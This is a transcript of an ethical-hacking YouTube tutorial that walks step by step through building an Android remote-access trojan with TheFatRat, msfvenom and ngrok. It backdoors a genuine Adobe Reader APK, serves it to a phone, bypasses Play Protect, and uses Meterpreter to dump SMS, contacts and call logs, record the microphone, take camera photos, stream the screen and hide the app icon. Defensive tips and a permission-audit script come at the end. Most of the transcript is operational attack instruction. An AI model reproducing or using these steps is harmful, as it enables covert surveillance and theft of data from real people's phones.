What if I told you that someone could be watching everything you do on your Android phone right now - your messages, your photos, your passwords, even listening through your microphone and watching through your camera? The scariest part? You'd never even know they were there. Welcome back to Tech Sky, your trusted source for ethical hacking and cybersecurity education. Today we're diving deep into one of the most dangerous threats to Android security: remote access exploitation. If you're new here and want to learn about cybersecurity and ethical hacking, make sure to subscribe and activate the notification bell. Your support helps us create more in-depth security content like this. The knowledge shared in this video is strictly for educational purposes and security research. Using these techniques without proper authorization isn't just unethical - it's illegal. All demonstrations are performed in a controlled lab environment using dedicated testing devices. We strongly condemn any malicious use of this knowledge. Our goal is to understand these threats to build better defenses. Let's understand why Android devices are such attractive targets for attackers. There are over three billion active Android devices worldwide. Each one is a powerful computer that contains its user's entire digital life: banking apps, social media, emails, photos - everything that matters is stored on these devices. But what makes Android particularly vulnerable is its open nature. Unlike other mobile operating systems, Android allows installation from unknown sources. While this flexibility is great for users, it also creates opportunities for attackers. Think about this: how many times have you installed an app from outside the Play Store? Maybe it was a game not available in your region or an app someone shared with you. Each time you do this, you're trusting that app with access to your digital life. 
Attackers exploit this trust - they create seemingly harmless apps: games, utilities, even security tools. But hidden inside these apps is code that creates a backdoor to your device. Once installed, these malicious apps can access your camera and microphone, read your messages and emails, steal your passwords and banking information, track your location, access your photos and files, even eavesdrop on your conversations. The most dangerous part? These apps can hide themselves, running silently in the background while harvesting your personal information. Today I'll show you exactly how these attacks work so you can better protect yourself and your devices. Let's move to our lab environment and see this in action. Now that we understand the basics, let's prepare our attack environment. We'll need two tools: TheFatRat and ngrok. Let's start with TheFatRat. First, let's update our system. Open your terminal and type "sudo apt update". This command refreshes our package lists from the repositories, ensuring we have access to the latest versions of all tools. After that, run "sudo apt upgrade". This command actually installs those latest versions, keeping our system secure and compatible with new tools. Now for TheFatRat installation, open your browser and search for TheFatRat GitHub. Click the first result from the Screetsec repository. This is the official repository, ensuring we're getting the legitimate tool. Copy the repository link from either the address bar or by clicking the code button. Back in our terminal, let's clone this repository. Type "git clone" and paste the URL we just copied. While this clones, let me explain what makes TheFatRat special. It's an exploitation framework that automates the creation of backdoors and payloads on top of msfvenom and Metasploit, and it adds packaging and encoding options intended to make payloads harder for antivirus to catch. Don't overrate that part: as you'll see later in this demonstration, Google Play Protect still flags the APK it produces. It's the automation that makes the tool both useful for testing and dangerous in the wrong hands.
Once cloning is complete, navigate into the repository with "cd TheFatRat". Run "ls" to see the contents. Notice that setup.sh file? That's our installer. But first, we need to make it executable. Run "chmod +x setup.sh". This command gives the file execution permissions. We'll need root privileges for installation, so run "sudo su" and enter your Kali Linux password to get a root shell. Now run "./setup.sh" to start the installation. Watch how it checks for all necessary modules. If you see a prompt about an incorrect version of Metasploit, type "yes" to install the correct version. The installation process is thorough - it's checking every required tool and marking each one with either a check for installed or a cross for missing. Don't worry about the missing ones - it will install them automatically. Just sit back and let it work. When prompted about the Backdoor Factory, choose option two for automatic installation. Next, it will ask for a folder path to save your generated payloads. While you could use the default path, let's make it more accessible. Open a new terminal in your Documents folder, run "pwd" to get the complete path, copy it and paste it back in TheFatRat's terminal. When asked if you want to run TheFatRat from anywhere using the "fatrat" command, type "Y" and press enter. This makes the tool easily accessible from any directory. To verify our installation, make sure you're still in the root shell and type "fatrat". Watch as it performs one final module check. Press enter when prompted and wait while it starts the PostgreSQL service that Metasploit's database needs. Press enter again at the next prompt, and there we have it - TheFatRat's main menu with all its options. We'll explore these in detail, but first let's install our second crucial tool: ngrok. Before we move forward, let's understand what ngrok is and why we need it. ngrok is a tunneling tool that creates tunnels from a public ngrok address to a port on your localhost, making that port reachable from the internet without opening anything on your router.
For our demonstration, we'll use it to publish our Metasploit listener on the internet, so the payload can connect back to our system from outside our local network. Let's install ngrok. Open your browser and search for "ngrok Linux". Click the first result that says "Download ngrok". On the download page, you should see Linux selected as your operating system. On the left side, they provide a simple installation command. Copy it exactly as shown and paste it into your terminal. Once ngrok is installed, let's verify it. Type "ngrok help" in your terminal. This shows all available commands. Scroll down and you'll see some sample commands. Let's try the basic one: "ngrok http 80". Notice the error? ngrok is telling us we need to do two things: sign up for an account and configure our auth token. See those links in the error message? Let's handle them one by one. Hold Control and click the first link - this opens the ngrok signup page in your browser. Complete the signup process on your own. Once you've created your account, go back to the terminal and click the second link to get your auth token. To configure ngrok with your auth token, run "ngrok config add-authtoken" followed by your token. This links ngrok to your account. Let's test our setup. Run "ngrok http 80" again. See how it starts up without errors now? Perfect. But there's one more crucial step. For our demonstration, we'll be using TCP instead of HTTP, because the Meterpreter payload speaks raw TCP, not HTTP. Try running "ngrok tcp 4444". You'll notice a different error - ngrok requires payment verification for TCP tunnels. Click the provided link. Similar to the signup process, you'll need to enter payment information, but don't worry - this is just for verification. ngrok won't charge you anything as we're using the free account. They require this verification because TCP tunnels can potentially be misused. After completing the payment verification, try "ngrok tcp 4444" again. Now it works: the "Forwarding" line shows a public ngrok address on the left and "localhost:4444" on the right, meaning anything that connects to that public address is delivered to port 4444 on our machine. Our environment setup is complete - both TheFatRat and ngrok are ready for our demonstration. Now we're at the main menu of TheFatRat.
Look at all these powerful options before us. We're interested in the first option: "Create backdoor with msfvenom". Type "1" and press enter. This brings us to a new menu with multiple options for different operating systems, programming languages, and frameworks. You can create payloads for Windows, Linux, PHP, and more, but today we're focusing on Android. Look at option 3: "Signed Android FatRat APK". Enter "3" and press enter. Now it's asking us to set LHOST IP. This is a crucial decision point - if you're performing this on your local network, you'd use your Kali Linux machine's local IP address. It's actually shown right above this prompt. But we're going beyond local testing - we want to demonstrate how this works over the internet. This is where ngrok comes in. Open the "ngrok tcp" terminal. Look at the address in the "Forwarding" line - we need to copy the hostname between "tcp://" and the colon, not the port after it. This is what we'll use instead of a local IP. Copy it, switch back to TheFatRat, and paste it as our LHOST. Next, it's asking for LPORT. Again, for local network testing, you typically use port 4444 - this is the default port that Metasploit uses for many of its handlers. But since we're using ngrok, we need the public port ngrok assigned to the tunnel, the number after the colon in that same "Forwarding" line. Copy that number from your ngrok terminal and paste it here. The APK will then connect to the public ngrok address, and ngrok will hand that connection to port 4444 on our machine. Now it wants a name for our output file. You can name it anything - I'm calling mine "my-rat". Think of this name carefully - in real security testing, it should blend in with normal apps. Look at these payload options. We're using TCP, so we want option 3: "android/meterpreter/reverse_tcp". This payload makes the app open a TCP connection back to our listener (a reverse connection, which is why it works from behind NAT and through ngrok) and loads the Meterpreter stage over it, giving us full control. The payload creation process has started - this might take a few minutes. TheFatRat is not just creating the payload, it's also signing it: Android refuses to install an unsigned APK at all, so the tool signs it with a throwaway key. That signature gets the file past the installer, not past Play Protect, as we'll see. Look at all these components being generated.
Now it's asking if we want to create a resource file for the Metasploit listener. For now, enter "N" for no - we'll handle our listener setup manually to better understand the process. Press enter again to return to the menu. Let's verify our payload was created. Remember when we set up TheFatRat? We configured it to save files in Documents. Open that folder, and there it is - our "my-rat.apk" is waiting to be deployed. Now comes the critical part: getting this payload onto our target device. In a real security assessment, this would involve social engineering, but since we're in our testing environment with full permissions, we have options. We could use a USB cable, but let me show you a quicker method: a throwaway Python web server. Right-click in the Documents folder and open Terminal here. We'll run a simple command: "python3 -m http.server 90". Let me explain what this does: Python has a built-in HTTP server module. The "-m" flag tells Python to run this module, and we're specifying port 90. Because 90 is below 1024, this only works from a root terminal; if you're not root, pick a port like 8000 and use that in the URL instead. This creates a basic web server that shares all files in our current directory. Now switch to your testing device - this could be an Android emulator or a physical device dedicated to security testing. Open its browser and enter your Kali machine's IP address followed by ":90". See how it shows our directory contents? And there's our "my-rat.apk" waiting to be downloaded. Click on the APK. Notice that warning: "File can't be downloaded securely". That's the browser objecting to a download over plain HTTP rather than HTTPS, since our Python server has no TLS - it says nothing about the app itself. It's showing two options: "Discard" or "Keep". Click "Keep" - we're accepting the insecure download. After downloading, try to install it. Look at that prominent warning: "Google Play Protect - Unsafe app blocked". This is Google's on-device scanner doing its job, detecting potentially harmful applications - and notice it caught our APK even though TheFatRat signed it. For our demonstration, click "More details" and then "Install anyway".
In real world security, these warnings are crucial protections that help users avoid malicious apps. Once installed, don't open it yet - click "Done". We need to set up our listener first. Exit the Python server with "Control+C" - we don't need it anymore. Back in the TheFatRat terminal, let's return to the main menu. Type "15" and press enter. Look at Option 10: "Jump to MSF console". Type "10" and press enter. A new terminal window opens, launching the Metasploit Framework. This is where the real power comes in. Wait for it to fully load - you'll see the "msf6>" prompt. First, let's clear the screen for better visibility. Type "clear". Now we need to set up our handler with "use exploit/multi/handler". This module is crucial - it's what catches and manages our incoming connection. Think of it as setting up a specialized receiver for our payload. We need to configure the exact same payload we used in our APK. Type "set payload android/meterpreter/reverse_tcp". To verify our configuration, type "show options". See how LPORT is already set to 4444? That's the local port our ngrok tunnel forwards to, so it's exactly right. But look - LHOST is empty. We need to set it. Type "set LHOST 0.0.0.0". This tells Metasploit to listen on all network interfaces. Keep the split clear in your head: the handler binds the local address and port, while the APK carries the public ngrok hostname and port, and ngrok bridges the two. Now comes the moment of truth: switch to your Android device and open the app. It's asking for permissions - click "Continue". We want to grant these for our testing. You'll see another warning about the app being built for an older Android version - click "OK" to dismiss it. Back to our MSF console terminal, type "run" and watch. (In practice you'd start the handler before launching the app; the Android payload keeps retrying the connection for a while, which is why this order still works here.) There it is - "Meterpreter session 1 opened"! We now have a complete connection to the Android device. Type "help" to see the full arsenal at our disposal. Look at all these commands! Let's test some of the most powerful ones. Type "sysinfo". Look what happens - it displays comprehensive system information about the target device.
You can see the Android version, architecture details - everything an attacker would need to tailor their next move. Type "webcam_list". This shows all available cameras on the device: front, back - any camera the device has access to. Try "dump_calllog". This command extracts the entire call history to a text file. Look into the TheFatRat folder - see how it saves everything there? That's simply the directory msfconsole was launched from, which is where the dump commands write their output. This folder becomes a treasury of extracted information. Let's grab more data. Type "dump_contacts". It pulls the entire contact list. Then "dump_sms" to download all text messages. Want to know where the device is? Type "geolocate". This gives us the device's current location. Here's something particularly stealthy: type "hide_app_icon". Watch what happens on the device - the app icon disappears from the App Drawer. The application keeps running, but the user can't see it anymore. This is why malicious apps are so dangerous - they can hide their presence while maintaining full access. First of all, in our previous section we've seen how to generate a standalone malicious app and, through that app, how you can hack an Android phone, track device location, and hide it. But you noticed that the app didn't look like a normal or legitimate one. The name of that app was "Main Activity", which doesn't seem legitimate at all. So in this section, which will be the advanced part of that demonstration, we will discuss how to turn a real, legitimate-looking app into a malicious one. Let's begin by opening the terminal and gaining root privileges by typing "sudo su", then entering your password. After that, run the command "fatrat" and you can see TheFatRat is opening. Press enter and continue whenever it asks. Now we are on the main menu of TheFatRat. In the previous section, we selected the first option which is "Create backdoor with msfvenom", but in this section we will not use that option. Instead, we will use the fifth option which is "Backdooring Original APK". To use this, type "5" and press enter.
Now you can see that it is asking to set the LHOST. In the previous section we used ngrok to work over the internet, but in this section we'll go with a simpler local flow to explain the process. So copy the LHOST provided above and paste it here. Now it is asking for the LPORT. Type "4444" here and press enter. This is Metasploit's default port, which is convenient in a lab. Keep in mind that for exactly that reason it's well known to defenders and often flagged by intrusion detection, so a real attacker would more likely pick a port that blends in with normal traffic, such as 443. Now here is the main part - it is asking to provide the path for the legitimate app in which we will inject the payload. Be careful! I recommend you not use any app without permission. For demonstration and testing purposes only, use those apps that are provided for security testing and experiments. The question is, where do we find such an app? It's not hard - TheFatRat ships some testing apps that you can use for this purpose. Here we have to copy the path of the app in which we want to inject our payload. So open the Kali home folder and go to the TheFatRat directory. Here you can see a folder for APKs - open it. Now here we have two more folders - open the first folder, and here you can see two apps are available for testing purposes: first is Adobe Reader and second is WhatsApp. We will use Adobe Reader for our demonstration. To copy the path, you can right-click and copy the path from Properties, or you can first click the app and press F2 to get the file name, copy it, and then paste it after the folder address. Now copy the complete address. When copied, go back to the TheFatRat terminal and paste it here, then press enter. Now you can see that TheFatRat is testing the app to see if it's suitable for payload injection. When the test is completed, you can see it's showing different types of payloads that we can inject into the app. We will use reverse TCP to establish a connection back to our machine when the victim opens the app. To use it, enter "3" and press enter.
Now it is showing three more options that are actually different methods for injecting the payload. First is "Use backdoor-apk 0.2.4a", which is a specialized tool for backdooring Android applications that preserves the original app's functionality. Second is "Use old TheFatRat method", which is a legacy approach that might work better on older Android versions. And third is "Use msfvenom embedded method", which directly embeds our payload using the Metasploit Framework's tools. We will use the third one - enter "3" and press enter. Now the process has started, but here you can see an error occurred stating that APKTool 2.6.0 is installed but we need at least version 2.9.2. So let's set up our environment accordingly. If you don't face this error, you can skip this process. To download the correct version of APKTool, open your web browser and search for "APKTool". Here you can see the first official link, and below this there is an install guide mentioned. Click the link and you will be redirected to the install guide page. Scroll down to the Linux section and click to download the latest version of APKTool. Now here you can see different versions, and we need at least 2.9.2. Click it to download it. After some time, it will be downloaded. Open the downloads folder and you can see it is here. Now open /home/kali and then the TheFatRat folder. In this, you can see the "tools" folder - open it, and inside it you can find the APKTool folder. Open it. Here you can see that three files are present. First is the APKTool wrapper script - we don't need to do anything with it. Second is the old APKTool jar - we need to replace it with the latest version. To do this, first delete this one, then copy the downloaded file and paste it here. Now press F2 to rename it: remove the version part from the file name so it becomes "apktool.jar". Now we have to change the version file - open it and you can see "2.6.0" is written.
Change it to "2.9.2", save it, and close it. Now open a new terminal and type the command "apktool --version" and you can see that the updated version is here. Now here we need to install another tool which is "apksigner". This tool signs APK files after modification, which is necessary because Android will not install an unsigned or badly signed APK. To install it, type the command "sudo apt install apksigner". Enter your Kali password and then type "y" to continue the installation. Now everything is done and we will return to the TheFatRat process. Now we're at the point where we previously faced the error. You can see the backdooring process has started. This will take some time. During this process, TheFatRat is decompiling the legitimate app with apktool, injecting our payload code and its permissions into it, and then recompiling and re-signing everything while preserving the app's original functionality. This approach is more complex than creating a standalone malicious app because it needs to ensure the original app still works normally while our backdoor runs silently in the background. When the process completes, we'll return to the menu. Next, let's open the folder where TheFatRat saved the app file. In our previous section, we set the save location to the Documents folder, so let's check there. Open the Documents folder and you'll see a file named "backdoor.apk". This is our malicious app. Now we need to transfer it to our testing Android device. Let's repeat the same process we did in the previous section. Open a new terminal in the Documents folder and run the command "python3 -m http.server 90". Now open the browser on your testing device and enter the IP address of your Kali machine with port 90. You can see the backdoor app is available here - click it to download it. Open the downloads and tap on the file to install it. Click the install button. Once installation completes, click "Done". We'll open the app after setting up the Metasploit listener.
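The apktool version error above is a good place for a small pre-flight check, so here is an added shell example; it is not part of TheFatRat or the original demonstration. It compares the version "apktool --version" reports against the 2.9.2 minimum the page hit, and it wraps "apksigner verify --print-certs" to show which key the rebuilt APK is signed with. That second check matters on the defensive side as well: a repackaged app is necessarily signed with the attacker's key, so its certificate digest will not match the genuine publisher's. The version strings fed to the demo calls are constructed, and the "backdoor.apk" file name is the one the page uses.

```shell
#!/bin/sh
# Added example, not TheFatRat's own code: check the apktool version the
# backdooring step needs, and inspect the signer of the rebuilt APK.

# True (exit 0) when dotted version $1 is >= $2, comparing field by field,
# so "2.10.0" correctly ranks above "2.9.2".
version_ge() {
    printf '%s\n%s\n' "$1" "$2" | awk -F. '
        NR == 1 { for (i = 1; i <= NF; i++) a[i] = $i + 0; n = NF }
        NR == 2 {
            m = (NF > n) ? NF : n
            for (i = 1; i <= m; i++) {
                x = (i in a) ? a[i] : 0
                y = (i <= NF) ? $i + 0 : 0
                if (x > y) exit 0
                if (x < y) exit 1
            }
            exit 0
        }'
}

# Strip suffixes like "-dirty" from what "apktool --version" prints.
apktool_version_string() {
    printf '%s\n' "$1" | sed -n 's/^\([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# Verdict for a reported version against a minimum: "OK <v>" or "TOO_OLD ...".
check_apktool_version() {
    have=$(apktool_version_string "$1")
    if version_ge "$have" "$2"; then
        printf 'OK %s\n' "$have"
    else
        printf 'TOO_OLD %s (need %s)\n' "$have" "$2"
    fi
}

# Run the real check against the apktool on PATH (skipped if not installed).
check_installed_apktool() {
    command -v apktool >/dev/null 2>&1 || { echo "apktool not on PATH"; return 2; }
    check_apktool_version "$(apktool --version 2>/dev/null)" "$1"
}

# Print the signing certificate(s) of an APK; needs the apksigner package.
apk_signer_certs() {
    command -v apksigner >/dev/null 2>&1 || { echo "apksigner not installed"; return 2; }
    apksigner verify --print-certs "$1"
}

# Demo with constructed version strings (no apktool needed to run this part).
check_apktool_version "2.6.0" "2.9.2"        # TOO_OLD 2.6.0 (need 2.9.2)
check_apktool_version "2.9.2-dirty" "2.9.2"  # OK 2.9.2
# After the rebuild: apk_signer_certs backdoor.apk
```

Compare the digest apksigner prints for backdoor.apk with the one for the untouched Adobe Reader APK from TheFatRat's folder: they differ, which is the single most reliable tell that an APK has been repackaged.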
Now that our malicious app is installed on the target device, we need to set up our listener to receive the connection when the app is opened. Let's open a new Kali Linux terminal and gain root privileges. Type "msfconsole" to launch the Metasploit Framework. This might take a moment to load. Once Metasploit loads, we need to configure our handler. Type "use exploit/multi/handler" and press enter. This module handles incoming connections from our payload. Next, we need to set our payload to match what we used in TheFatRat. Type "set payload android/meterpreter/reverse_tcp" and press enter. Let's check what options we need to configure. Type "show options" and press enter. You'll see that LHOST isn't set yet, but LPORT is already set to 4444, the same port we specified earlier. To set LHOST, type "set LHOST" followed by your Kali machine's IP address. Now comes the exciting part - type "run" and press enter. This starts our handler, which will wait for the target device to connect. Switch to your Android device and open the Adobe Reader app that we modified. Watch your Metasploit console closely - within moments, you should see a message indicating that a Meterpreter session has been opened. This means we now have a connection to the target device. What makes this attack particularly dangerous is that the Adobe Reader app appears to function normally to the user - they can still use it to read PDFs while our backdoor is running silently in the background. Let's explore what we can do with this connection. First, at the Meterpreter prompt, type "sysinfo" and press enter. This command gives us detailed information about the compromised device, including its Android version, hardware details, and architecture. This is crucial information that attackers use to determine which exploits might work against the target device. Next, let's try one of the most invasive capabilities: audio recording. Type "record_mic -d 10" and press enter.
This records 10 seconds of audio through the device's microphone and saves it to your attacking machine. The victim would have absolutely no indication that their conversations are being recorded. This could be used to capture sensitive discussions, personal conversations, or even passwords spoken aloud. Now let's check what cameras are available on the device. Type "webcam_list" and press enter. You'll see a list of available cameras on the device, typically both front and back cameras are listed. Each camera has an index number assigned to it. Let's take a photo using the front-facing camera without the victim knowing. Type "webcam_snap -i 2" and press enter. The number after "-i" specifies which camera to use - in this case camera index 2, which is typically the front camera. This captures a photo using the selected camera and saves it to your attacking machine. Think about the privacy implications of this - an attacker could secretly take photos of the victim or their surroundings. We can even capture what's on the screen. Type "screenshot" and press enter. This takes a screenshot of whatever is currently displayed on the victim's device and saves it to your machine. This could be used to capture sensitive information like banking details, private messages, or passwords. For continuous monitoring, we can use "screenshare", which gives us a live feed of the victim's screen. Type "screenshare" and press enter. Now you can see everything they're doing on their device in real time. We can also explore the device's file system using the familiar ls, cd and download commands. Within what the app's permissions allow - its own sandbox plus shared storage - you can access photos, documents, downloads, and other sensitive files stored on the victim's device. Now let me be very clear - all of these capabilities I've just demonstrated are why mobile security is so crucial. The fact that we've disguised our malicious code inside what appears to be a legitimate app makes this attack vector particularly dangerous.
Most users wouldn't think twice about installing a PDF reader app, especially if it came from what appeared to be a legitimate source. Now that you understand how devastating these attacks can be, let's talk about protecting yourself and your devices. This isn't just theory - these are practical steps that could save your digital life. First and most crucial: never ever install apps from unknown sources. I know it's tempting when you find an app that's not on the Play Store, but this is exactly how attackers get in. That "Install unknown apps" permission in your security settings (older versions call it "Unknown Sources")? Think of it as the front door to your digital house - keep it locked, for every app, including your browser. Google Play Protect isn't just annoying popups - it's your first line of defense. When you saw those warnings during our demonstration, that was Play Protect doing its job. Never bypass these warnings on your personal device - the few seconds it takes to find a legitimate app on the Play Store could save you from months of privacy nightmares. Keep your Android system updated - every security patch matters. Those update notifications you keep postponing? Schedule them tonight. Attackers often exploit known vulnerabilities that are already patched in newer versions. Here's something many people overlook: check your installed apps regularly. Go to Settings, then Apps. Look for anything you don't remember installing. Pay special attention to apps with weird names or symbols you don't recognize, and remember that an app with a hidden icon still appears in this list even though it's gone from the app drawer. If something looks suspicious, remove it immediately. Watch your app permissions carefully - an app asking for permissions it shouldn't need is a massive red flag. Why would a calculator need access to your camera? Why does a game need to read your SMS messages? Those are exactly the permissions the backdoored Adobe Reader asked for, and they're how malicious apps maintain their control. Use a reliable mobile security solution - the built-in Play Protect is good, but additional security can provide extra layers of protection.
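For the "check your installed apps and watch their permissions" advice, here is an added shell example for readers with adb and a test device; it is not part of the original video. It reads the text "adb shell dumpsys package <pkg>" prints, counts how many of the sensitive permissions a RAT relies on (camera, microphone, SMS, call log, contacts, location) have been granted, and reports whether the package has a disabled component, which is what "hide_app_icon" leaves behind when it disables the launcher activity. The dumpsys excerpt, the package name and the threshold of three permissions are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original page: a permission triage helper that
# works on "adb shell dumpsys package <pkg>" output. The sample excerpt,
# package name and risk threshold below are made up for the demo.

# Runtime permissions a RAT needs that a PDF reader or a game does not.
SENSITIVE='android.permission.CAMERA
android.permission.RECORD_AUDIO
android.permission.READ_SMS
android.permission.READ_CALL_LOG
android.permission.READ_CONTACTS
android.permission.ACCESS_FINE_LOCATION'

# Print each sensitive permission that appears as "granted=true", one per line.
granted_sensitive() {
    printf '%s\n' "$SENSITIVE" | while IFS= read -r perm; do
        if printf '%s\n' "$1" | grep -qE "^[[:space:]]*${perm}: granted=true"; then
            printf '%s\n' "$perm"
        fi
    done
}

# Verdict based on the count; three or more is the (assumed) threshold.
risk_verdict() {
    n=$(granted_sensitive "$1" | wc -l | tr -d ' ')
    if [ "$n" -ge 3 ]; then
        printf 'SUSPICIOUS (%s sensitive permissions)\n' "$n"
    else
        printf 'ok (%s sensitive permissions)\n' "$n"
    fi
}

# First entry under "disabledComponents:", if any. A disabled launcher
# activity is how an app vanishes from the app drawer while still running.
hidden_launcher() {
    printf '%s\n' "$1" | awk '
        /disabledComponents:/ { f = 1; next }
        f { sub(/^[[:space:]]+/, ""); print; exit }'
}

# Walk every third-party package on an attached device (needs adb + USB debugging).
audit_device() {
    command -v adb >/dev/null 2>&1 || { echo "adb not found"; return 2; }
    adb shell pm list packages -3 | sed 's/^package://' | tr -d '\r' |
    while IFS= read -r pkg; do
        dump=$(adb shell dumpsys package "$pkg")
        printf '%s: %s' "$pkg" "$(risk_verdict "$dump")"
        h=$(hidden_launcher "$dump")
        [ -n "$h" ] && printf ' [disabled component: %s]' "$h"
        printf '\n'
    done
}

# Constructed dumpsys excerpt for a fake package (shape matches real output).
SAMPLE='  Package [com.example.pdfreader] (1a2b3c):
    userId=10123
    versionName=1.0
    runtime permissions:
      android.permission.CAMERA: granted=true
      android.permission.RECORD_AUDIO: granted=true
      android.permission.READ_SMS: granted=true
      android.permission.READ_CONTACTS: granted=true
      android.permission.ACCESS_FINE_LOCATION: granted=false
    disabledComponents:
      com.example.pdfreader.MainActivity'

risk_verdict "$SAMPLE"     # SUSPICIOUS (4 sensitive permissions)
hidden_launcher "$SAMPLE"  # com.example.pdfreader.MainActivity
```

The count is a triage signal, not proof: a messaging app legitimately holds several of these. What you are looking for is the mismatch between what an app is for and what it has been granted, plus the disabled launcher activity, which almost no legitimate app does to itself.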
Look for solutions that offer real-time scanning and app behavior monitoring. For the tech-savvy users, consider using an app like Network Monitor Mini. It shows you all active network connections on your device. If you see suspicious outbound connections, especially to unknown addresses or to an app that has no business talking to the internet, investigate immediately. Monitor your battery usage - malicious apps often drain battery by running constantly in the background. If your battery life suddenly decreases or your phone feels hot when you're not using it, check your battery usage statistics for suspicious activity. Here's a pro tip: use Android's built-in Safe Mode when you suspect something's wrong. Press and hold the power button, then long-press the "Power off" option in the power menu, and you'll be offered "Reboot to safe mode" (the exact wording varies between manufacturers). This prevents third-party apps from running, making it easier to identify and remove malicious ones. For those interested in diving deeper into Android security, we'll be covering advanced protection techniques in our next videos exclusively for channel members. We'll explore custom security configurations, advanced monitoring tools, and professional-grade security hardening techniques. To join our membership, click the link above in the info icon. Remember, the knowledge we've shared today carries great responsibility - use it to protect yourself and others, never for malicious purposes. Understanding these attacks is crucial for defense, but implementing them without authorization is illegal and unethical. If you found this information valuable, smash that like button, subscribe, and hit the notification bell to stay updated with our latest security insights. Share this video with anyone you care about - knowledge is our best defense against cyber threats. This is Tech Sky, reminding you that in the vast tech landscape, security illuminates our path forward. Stay curious, stay ethical, and keep learning!